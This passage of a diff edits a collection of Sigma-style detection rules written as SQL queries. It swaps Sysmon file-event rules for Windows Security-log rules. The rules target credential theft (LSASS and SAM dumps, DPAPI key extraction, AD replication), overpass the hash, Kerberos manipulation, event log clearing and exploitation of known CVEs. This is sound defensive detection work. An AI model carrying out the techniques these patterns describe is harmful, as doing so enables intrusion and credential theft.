suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": 
"HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with 
PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA 
secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local 
Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": 
"file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": 
"experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects 
programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": 
"file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
